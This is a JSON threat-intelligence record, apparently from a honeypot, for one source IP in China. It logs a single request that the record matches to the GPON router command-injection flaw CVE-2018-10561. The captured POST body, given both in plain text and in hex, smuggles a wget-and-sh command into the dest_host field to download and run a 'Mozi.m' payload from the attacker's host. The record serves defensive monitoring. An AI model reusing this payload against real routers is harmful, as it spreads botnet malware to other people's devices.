{"ip":"27.215.55.164","total_events":1,"verdict":{"verdict":"probing","label":"Low-level probing","detail":null,"confidence":"low","network_type":"nsp"},"first_seen":"2026-06-19T11:00:27","last_seen":"2026-06-19T11:00:27","events_24h":1,"events_7d":1,"geo":{"country_code":"CN","country_name":"China","region":"Guangdong","city":"Guangzhou","lat":23.1181,"lon":113.2539,"asn":4837,"org":"CHINA UNICOM China169 Backbone"},"source_domain":null,"known_scanners":[],"scanner_tag":{"key":"peeringdb:as4837","label":"China Unicom","category":"isp","url":"https://www.peeringdb.com/asn/4837"},"cve_matches":[{"cve_id":"CVE-2018-10561","title":"GPON Router Command Injection","severity":"CRITICAL","actively_exploited":true,"match_field":"url_path","matched_pattern":"GponForm/diag_Form"}],"top_ports":[{"port":8080,"proto":"tcp","label":"HTTP-alt","count":1}],"fingerprints":{"ssh_hassh":[],"tls_ja4":[],"tls_ja3":[],"ja4h":["po11nn0600_1386cd485c90"]},"fingerprint_peers":{"po11nn0600_1386cd485c90":23},"user_agents":["Hello, World"],"timeline":[{"date":"2026-06-19","count":1}],"recent_events":[{"timestamp":"2026-06-19T11:00:27","port":8080,"proto":"tcp","app_proto":"","app_protocol":"http","host":"127.0.0.1","headers":"{\"accept\":\"*/*\",\"accept-encoding\":\"gzip, deflate\",\"connection\":\"keep-alive\",\"content-length\":\"118\",\"host\":\"127.0.0.1:8080\",\"user-agent\":\"Hello, World\"}","body":"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://27.215.55.164:43326/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/GponForm/diag_Form?images/","summary":"","payload_hex":"504f5354202f47706f6e466f726d2f646961675f466f726d3f696d616765732f20485454502f312e310d0a486f73743a203132372e302e302e313a383038300d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a4163636570742d456e636f64696e673a20677a69702c206465666c6174650d0a4163636570743a202a2f2a0d0a557365722d4167656e743a2048656c6c6f2c20576f726c640d0a436f6e74656e742d4c656e6774683a203131380d0a0d0a58576562506167654e616d653d6469616726646961675f616374696f6e3d70696e672677616e5f636f6e6c6973743d3026646573745f686f73743d60603b776765742b687474703a2f2f32372e3231352e35352e3136343a34333332362f4d6f7a692e6d2b2d4f2b2d3e2f746d702f67706f6e383038303b73682b2f746d702f67706f6e38303830266970763d30","method":"POST","user_agent":"Hello, World","community_id":"1:fjnVzp2T+tKzwAhBtzDuBQvYabc=","ja3":"","session":"e9258560-977e-416b-bc8a-13ea8fd788c5","seq":1,"duration_ms":100,"bytes_in":325,"bytes_out":78}],"http_methods":[{"method":"POST","count":1}],"distinct_ports_total":1,"top_paths":[{"path":"/GponForm/diag_Form?images/","count":1,"ports":1}],"distinct_paths_total":1,"top_snis":[],"top_hosts":[{"value":"127.0.0.1","count":1}],"top_alpns":[],"banners":[],"credentials":[],"header_profile":{"signature":["Accept","Accept-Encoding","Connection","Content-Length","Host","User-Agent"],"representative":[{"name":"Accept","value":"*/*","notable":false},{"name":"Accept-Encoding","value":"gzip, deflate","notable":false},{"name":"Connection","value":"keep-alive","notable":false},{"name":"Content-Length","value":"118","notable":false},{"name":"Host","value":"127.0.0.1:8080","notable":false},{"name":"User-Agent","value":"Hello, World","notable":false}],"distinct_sets":1,"events_with_headers":1},"tags":[{"tag_id":"CVE-2018-10561","tag_type":"cve","title":"GPON Router Command Injection","severity":"CRITICAL","actively_exploited":true,"match_field":"url_path","matched_pattern":"GponForm/diag_Form","reference_urls":[]}],"data_as_of":"2026-06-20T08:07:35.886830+00:00"}